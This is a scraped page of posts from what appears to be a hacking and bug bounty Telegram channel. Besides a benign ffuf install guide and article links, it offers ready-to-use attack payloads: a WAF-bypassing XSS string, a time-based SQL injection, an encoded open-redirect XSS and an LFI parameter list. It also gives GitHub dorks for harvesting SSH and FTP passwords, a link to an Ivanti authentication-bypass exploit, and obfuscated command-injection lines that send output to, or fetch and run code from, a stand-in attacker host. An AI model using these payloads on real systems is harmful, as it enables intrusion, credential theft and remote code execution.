BugCod3
@BugCod3
6.19K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
Download Telegram
About
Blog
Apps
Platform
Join
BugCod3
6.19K subscribers
BugCod3
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.

Installation
Download a prebuilt binary from releases page, unpack and run!

or

If you are on macOS with homebrew, ffuf can be installed with: 
brew install ffuf

or

If you have recent go compiler installed: 
go install github.com/ffuf/ffuf/v2@latest
(the same command works for updating)

or

git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build

Ffuf depends on Go 1.16 or greater.

GitHub

#Web #InfoSec #Fuzzer

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
2
741 views
BugCod3
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
711
753 views
BugCod3
Bypass Cloudflare WAF (XSS without parentheses) 

javascript:var{a:onerror}={a:alert};throw%20document.domain


#xss #bugbountytips #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥1
826 views
BugCod3
🔥New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW


MySQL

#bugbountytip #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2👎21🔥1
907 views
BugCod3
I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javascript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

📘 Twitter

#bugbounty #xss #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥21🤣1
883 views
BugCod3
JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21🔥1
813 views
BugCod3
LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
21🔥1
1.07K views
BugCod3
OS Command Injection ⚔️

curl${IFS}$(whoami).atckr

echo${IFS}Y3VybCBodHRwOi8vdTBfYTIxNS1sb2NhbGhvc3QuYXR0YWNrZXIK|base64${IFS}-d|bash

curl${IFS}atckr?$(whoami)

echo${IFS}Y3VybCBodHRwOi8vYXR0YWNrZXI/dTBfYTIxNT1sb2NhbGhvc3QK|base64${IFS}-d|bash

#InfoSec #CyberSec #BugBounty #Tip

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥321🎃1
1.05K views
BugCod3
🔥 [remote] Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass

🔗 Read / Download

#BugCod3 #security #bugbounty #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
22🔥2
1.67K viewsedited  
BugCod3
How this seasoned bug bounty hunter combines Burp Suite and HackerOne to uncover high-impact vulnerabilities
Arman S., a full-time independent security researcher and bug bounty hunter, talked us through how he uses Burp Suite Professional and HackerOne in tandem to find and report high-value security vulner

🔗 Read more

#BugCod3 #security #bugbounty #infosec #portswigger

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
11🔥1
2.24K viewsedited